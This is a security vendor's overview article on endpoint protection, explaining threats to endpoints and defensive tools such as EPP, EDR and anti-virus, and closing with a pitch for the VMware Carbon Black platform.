Endpoint Protection

Endpoints used to be safely operated behind a network perimeter. However, the rapid growth of remote access to corporate resources, cloud-based applications and social media by desktops, laptops, smartphones and tablets means that the endpoint is now the new perimeter. Endpoints are being attacked in a variety of ways, including email-based phishing, ransomware, malware, and drive-by downloads from web surfing.

Given that endpoints often store large quantities of corporate data, and also contain virtually everything that attackers need to gain entry into corporate networks, robust endpoint protection is a critical element in any corporate security infrastructure.

Key points:

• Threat actors have expanded the range of attack vectors used against organizations and endpoints. As threats expand, so too must the nature of security defenses to protect against and mitigate advanced and emerging threats. Anti-virus protections alone will not protect endpoints from modern threats.
• Endpoints are attractive to threat actors for three reasons: many endpoints directly store sensitive and confidential business data that can be used for nefarious purposes, compromising an endpoint often provides access to further network resources and cloud data repositories, and newer categories of mobile endpoints have lower security defenses compared to endpoints located behind perimeter and network security defenses.
• Ransomware, malware, phishing attempts and other types of cyber-attacks continue to grow in volume and complexity, with several hundred thousand new malicious programs or unwanted apps registered every day.
• New categories of endpoints with emergent business applications are finding their way into physical organizational spaces. Equally, compromising the operational technology endpoints that power smart buildings would enable an attacker to manipulate people’s movements within a building, potentially creating life-and-death situations as the building turns against its inhabitants. The security threats that might be targeted against these new categories of endpoints are unknown or only poorly understood at this stage.
• Addressing the threats unleashed against endpoints requires a prudent balancing of people, process and technology investments. All three working in synergy provides the basis for effective protection, while relying on only one or two will undermine the efficacy of the overall playbook.

Threats to Endpoints

Two statements are true about endpoints: first, they are critical to getting work done by employees, and second, they are under attack by cyber criminals. With respect to employees, a growing diversity of endpoints are used for task completion, organizational communication, team collaboration and virtual meetings, including laptops, tablets, smartphones, and new smart devices such as smart speakers.

Cyber criminals, on the other hand, have diversified the range of attacks unleashed against endpoints that circumvent traditional endpoint security capabilities to gain a foothold for data exfiltration, credential compromise and fraud. Initial footholds lead to further attacks, including supply chain phishing attacks and lateral movement to gain control over an increasing set of endpoints, servers and other network devices in anticipation of a master stroke to cripple the organization, such as through a ransomware attack.

Security threats against endpoints include traditional and emerging attack vectors, such as malware, fileless attacks, data breaches, ransomware, phishing attacks, phishing via social media, unpatched vulnerabilities, compromised software patches and updates, drive-by downloads, infected USB drives, insecure and non-compliant applications, new devices that lack strong security and new categories of endpoints that have undetermined security threats.

Dynamics of Protecting Endpoints

Understanding the current dynamics in endpoint usage and the security threats deployed against endpoints is essential in embracing appropriate security solutions. The following dynamics are at play:

• Growing volume and complexity of threats.
• Growing diversity in endpoints.
• Fewer security signals.
• Dealing with log data.

Things changing in the endpoint security space during the near and mid-term:

• The essential notion of a corporate network is becoming redundant, as core IT services, data repositories, and applications are outsourced across multi-vendor cloud services. An increasing proportion of corporate data traffic is bypassing network security infrastructure in favor of direct connectivity between endpoints and a plethora of cloud services. Under such an architectural approach, security has to move closer to the endpoints and each of the connected services, with a consolidated reporting and analytics layer to assess threats across a diverse data estate and enable security professionals to respond appropriately.
• Cyber attackers using ransomware are beginning to increase the pressure on compromised targets by embracing a different approach. Initially the threat was “pay the ransom or lose your data forever,” but this is often ineffective at gaining a ransom payment because many organizations refuse to pay the ransom on principle. Attackers are transitioning to a more lucrative business model: “pay the ransom or we will publish your data” - and by implication, create a data breach situation that attracts regulatory investigation and inflicts financial damage through reputational loss.
• Every new device type and category introduces new security threat vectors, opening avenues for cyber-attacks to cause disruption and loss. For example, compromising the operational technology endpoints that power smart buildings would enable an attacker to manipulate people’s movements within a building, potentially creating life-and-death situations as the building turns against its inhabitants. Compromising the air conditioning systems to introduce weaponized air flow is a related example. We have already seen some early attempts of compromised industrial infrastructure being manipulated to cause loss of human life, and those same threat playbooks could potentially be leveraged against office buildings.

Solutions to consider for improving Endpoint Protection

A multitude of solutions are available for improving endpoint protection, and as a critical enabler of productivity on one hand and a growing vector of compromise on the other, having appropriate protections in place is essential.

We see the following solutions as core to improving endpoint protection.

People, Process and Technology

Seeking to improve endpoint protection requires giving attention to the three complementary strands of people, process and technology. The dynamic interplay between these three enables strong protections for endpoints; attempting to wing it on only one or two will be ineffective.

The technology component offers a wide array of potential security protections for endpoints. It’s easy to spend money acquiring new technology options, but without corresponding capability improvements in the people and process components, little value will be created. Spending anything on security protections that are poorly used and don’t align with the business threat landscape is a waste of financial investment, human capital, and the already stretched energy of cyber security professionals.

Endpoint Protection Platforms (EPP)

EPPs offer an integrated collection of capabilities for protecting endpoints, covering different solution areas that were originally brought to market as point solutions. The roster of usual capabilities spans anti-virus, URL filtering, baseline endpoint prerequisites, vulnerability analysis and resolution, visibility into and control over endpoint encryption settings, and more. Endpoint Detection and Response (EDR) capabilities are also increasingly integrated with EPP solutions.

An EPP offers capabilities to:

• Monitor, protect and report on all connected endpoints, both on and off the network through agent-based capture of events on the endpoint with submission to the platform for centralized oversight and analysis. The detailed logs from endpoints combined with consolidated analysis in the platform enables early identification of abnormal behavior and emerging threats.
• Automatically resolve security incidents with minimal involvement from cyber security staff. For example, automated playbooks specify how the platform should respond to newly identified and emerging threats on a given endpoint, and how to harden security defenses across the rest. Having a security platform that will automatically deal with as much as possible enables cyber security staff to focus on the higher-level issues, critical threats, and overall strategy of ensuring endpoint protection.
• Detect and enroll newly identified endpoints across the network estate. While written security policies are essential for creating the context of expectation for the introduction of new endpoints, proactive automated discovery is essential.

Organizations are increasingly moving to cloud-based EPPs, thereby eliminating the need for deploying and managing on-premises infrastructure. In addition to the much faster time-to protection offered by cloud-based EPPs, such services also offer the advantage of a wider set of threat signals from a huge number of global customers from which to develop threat intelligence that can be shared across all customers to thwart new threats. Organizations attempting to go it alone with an on-premises EPP will not have access to the same quality of threat intelligence.

Endpoint Detection and Response (EDR)

EDR solutions take a different approach to security attacks and threats, by providing visibility into current attacks and threats on endpoints, along with options for remediation across the endpoint estate. EDR doesn’t primarily attempt to stop attacks - a role played by solutions under the EPP banner - but rather to analyze emerging threats and supply tools for resolving compromised endpoints and hardening the rest. EDR solutions achieve these outcomes by supplying continuous real-time or near real-time visibility into what’s happening across all connected endpoints, offering early warning signals of abnormal behaviors that betray the real intent of seemingly harmless but obfuscated emerging threats. Once new attack chains are identified, protections can be rolled out to other vulnerable endpoints to decrease the likelihood of further threats landing successfully.

Anti-Virus (AV)

Protection against known viruses and malware is important - why get compromised with what’s already been seen and mitigated? - but traditional signature-based anti-virus tools alone no longer offer effective protections. As the quantity of known viruses and malware increases, there’s a logistical challenge of keeping all endpoints up-to-date with the latest signatures. Theoretically, at some point, signature files would need to be streamed continuously and in real-time, meaning that any non-connected endpoints would be at risk. Behavior-based profiling of all processes – for both known and unknown viruses and malware - offers a more strategic and lighter approach to ensure threats are mitigated.

For organizations using Windows 10, one potential short-term approach to the anti-virus quandary is to rely on the default anti-virus and anti-malware protections in Windows 10. The budget that would have been spent buying best-of-breed tools can then be invested in creating protections against the newer, advanced and emerging threats that anti-virus and anti-malware are ineffective against.

Finally, while not an endpoint protection method that is deployed on the endpoint itself, cloud based sanitization via virus and malware checking of inbound and outbound email streams is a very useful wider security protection as part of an overall security strategy

Endpoint protection must be a key component in an overall security strategy, but can only be one strand complemented with cloud security, network security, and physical security, among others. An overall security strategy should be created and defined in light of an enterprise-wide risk assessment for the organization.

iSOC24 carries the VMware CarbonBlack Endpoint Protection Platform in its portfolio. If you would like to learn more please contact one of our specialists to hear about the advantages of Endpoint Protection technology of VMware CarbonBlack within your organization.